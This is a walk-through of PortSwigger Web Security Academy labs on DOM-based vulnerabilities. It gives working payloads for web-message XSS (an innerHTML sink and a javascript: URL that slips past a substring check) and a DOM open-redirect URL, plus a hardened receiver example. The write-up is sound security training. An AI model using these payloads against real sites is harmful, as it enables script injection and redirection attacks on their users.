Walk-through of the DOM-based vulnerabilities lab on PortSwigger Web Security Academy. DOM-based vulnerabilities arise when a website contains JavaScript that takes an attacker-controllable value, known as a source, and passes it into a dangerous function, known as a sink.
- Practitioner – DOM XSS using web messages
- Practitioner – DOM XSS using web messages and a JavaScript URL
- Practitioner – DOM XSS using web messages and JSON.parse
- Practitioner – DOM-based open redirection
- Practitioner – DOM-based cookie manipulation
- Expert – Exploiting DOM clobbering to enable XSS
- Expert – Clobbering DOM attributes to bypass HTML filters
Practitioner – DOM XSS using web messages
This lab demonstrates a simple web message vulnerability. To solve this lab, use the exploit server to post a message to the target site that causes the print() function to be called.
See Web message manipulation (PortSwigger). The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
The Home page contains this JavaScript code:
```html
<!-- Ads to be inserted here -->
<div id='ads'></div>
<script>
window.addEventListener('message', function(e) {
    document.getElementById('ads').innerHTML = e.data;
})
</script>
```
Open the Exploit server from the web application. Enter the iframe in the Body and click Deliver exploit to victim.
```html
<iframe src="https://<LAB ID>.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')"></iframe>
```
The postMessage method sends a web message to the home page. The event listener does not check the message origin and writes the message content straight into the `<div>` used for ads via innerHTML, so the `<img>` element is rendered, its `onerror` handler fires and print() is called.
Practitioner – DOM XSS using web messages and a JavaScript URL
This lab demonstrates a DOM-based redirection vulnerability that is triggered by web messaging. To solve this lab, construct an HTML page on the exploit server that exploits this vulnerability and calls the print() function.
The Home page contains this JavaScript code:
```html
<script>
window.addEventListener('message', function(e) {
    var url = e.data;
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
        location.href = url;
    }
}, false);
</script>
```
Open the Exploit server from the web application. Enter the iframe in the Body and click Deliver exploit to victim.
```html
<iframe src="https://<LAB ID>.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print();//http:','*')"></iframe>
```
The postMessage method sends a web message to the home page. The listener only checks that the substring `http:` or `https:` appears somewhere in the message, so a `javascript:` URL with `//http:` appended as a comment passes the check and is assigned to the location.href sink, which executes print().
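The following is an added example, not code from the lab or from PortSwigger: it places the lab's substring check beside a hardened receiver that validates the sender origin and parses the URL before touching a sink. The listener logic is written as pure functions so it runs under Node without a DOM; `TRUSTED_ORIGINS` is a hypothetical allowlist.

```javascript
// Weak check copied from the lab's listener: a substring search anywhere in
// the string, so 'javascript:print();//http:' is accepted.
function weakLooksLikeHttpUrl(url) {
  return url.indexOf('http:') > -1 || url.indexOf('https:') > -1;
}

// Hardened check: parse the value as an absolute URL and require an http(s)
// scheme. javascript:, data: and relative values all return null.
function safeHttpUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value));
  } catch (err) {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return null;
  }
  return parsed.href;
}

// Hypothetical allowlist of origins permitted to post messages to this page.
const TRUSTED_ORIGINS = ['https://trusted.example'];

// Receiver logic for the second lab's listener. The exploit page passes '*'
// as the postMessage target origin; what matters on the defending side is
// that the receiver checks event.origin before the data reaches any sink.
function handleMessage(event, allowedOrigins = TRUSTED_ORIGINS) {
  if (!allowedOrigins.includes(event.origin)) {
    return { action: 'ignore', reason: 'untrusted origin' };
  }
  const target = safeHttpUrl(event.data);
  if (target === null) {
    return { action: 'ignore', reason: 'not an http(s) URL' };
  }
  // In the browser this is the point where location.href = target would run;
  // a real site would additionally restrict target to its own hosts.
  return { action: 'redirect', target };
}
```

The same origin check applies to the first lab's listener, where the remaining fix is to write the message with textContent instead of innerHTML.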
Practitioner – DOM XSS using web messages and JSON.parse
NOT COMPLETED
Practitioner – DOM-based open redirection
This lab contains a DOM-based open-redirection vulnerability. To solve this lab, exploit this vulnerability and redirect the victim to the exploit server.
From the Home page, click on View post for any blog post and inspect the page. The Back to Blog link builds its redirect target from the `url` query parameter:
```html
<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); location.href = returnUrl ? returnUrl[1] : "/"">Back to Blog</a>
```
The regular expression accepts any `http://` or `https://` value without restricting the host, so the `url` parameter is vulnerable to open redirection. Visit this link to solve the lab:
```
https://<LAB ID>.web-security-academy.net/post?postId=4&url=https://exploit-<EXPLOIT SERVER ID>.exploit-server.net
```
Practitioner – DOM-based cookie manipulation
NOT COMPLETED
Expert – Exploiting DOM clobbering to enable XSS
NOT COMPLETED
Expert – Clobbering DOM attributes to bypass HTML filters
NOT COMPLETED